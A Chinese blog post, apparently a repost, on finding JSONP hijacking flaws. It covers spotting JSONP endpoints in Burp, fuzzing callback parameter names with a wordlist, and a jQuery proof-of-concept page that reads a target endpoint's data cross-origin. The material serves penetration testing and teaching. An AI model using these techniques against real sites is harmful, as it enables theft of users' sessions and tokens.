内容简介:jsop,其实很早以前就被人玩烂了,但是我一直没有重视,感觉顶多泄露点个人信息,直到这个星期,挖到一个jsonp泄露session的漏洞这个星期测了个在线教育的站,域名有很多个,不同域名下的访问就会产生一个跨域的问题,跨域的解决方案一般有三种 CORS、postMessage和jsonp。这里jsonp的原理就不细讲了。那个网站登陆页面在域名A,登陆认证的后端在域名B,当登陆成功之后域名A有时就会请求域名B接口获取session
jsop,其实很早以前就被人玩烂了,但是我一直没有重视,感觉顶多泄露点个人信息,直到这个星期,挖到一个jsonp泄露session的漏洞
这个星期测了个在线教育的站,域名有很多个,不同域名下的访问就会产生一个跨域的问题,跨域的解决方案一般有三种 CORS、postMessage和jsonp。这里jsonp的原理就不细讲了。
那个网站登陆页面在域名A,登陆认证的后端在域名B,当登陆成功之后域名A有时就会请求域名B接口获取session
其实原理没什么好讲的,讲这个主要是提醒自己不要小看一些漏洞,像jsonp劫持最多的危害就是泄露敏感信息,比如用户信息、token之类的。
jsonp原理
懒得写了,先占个坑以后补
挖掘jsonp劫持漏洞
有很多 程序员 在写接口的时候都会顺手写个jsonp的接口,可以先开着bp看一下功能点,看看是否有地方用了jsonp
快速寻找jsonp的接口
开着bp逛一圈,一般有jsonp的数据传输会在mimetype中显示为script,通过 排序 可以快速得找到
callback的值,就是jsonp回传回来的函数名
然后只要查看传输的数据中是否有敏感信息就可以了
寻找敏感的json数据
如果jsonp的接口没有敏感信息传输,json数据包中恰好有的话,我们可以尝试一下程序员是否有开发jsonp的格式,大多数程序员喜欢把jsonp的回传参数命名为callback
当然还有其他的可能,贴一份字典,直接用Intruder Fuzz一下试试:
callback=attack cb=attack call=attack jsonp=attack jsonpcallback=attack jsonpcb=attack json=attack jsoncallback=attack jcb=attack
漏洞证明
http://47.98.109.141:5000/interface?callback=attack
返回的数据为
attack({"value":1})
使用下面的poc
jsonp 填写回调参数的名字
jsonpcallback就是回调参数的值
alert的地方根据需要更改取值
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>jsonp劫持</title>
<script src="js/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$.ajax({
url:"http://xxx.com/interface",
dataType:"jsonp",
jsonp:"callback",
jsonpCallback:"attack",
success:function (data) {
alert(data.value)
}
})
</script>
</body>
</html>
如果能正常取到值,就说明漏洞存在了
漏洞利用的话就具体情况具体分析了,这里就不赘述了
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
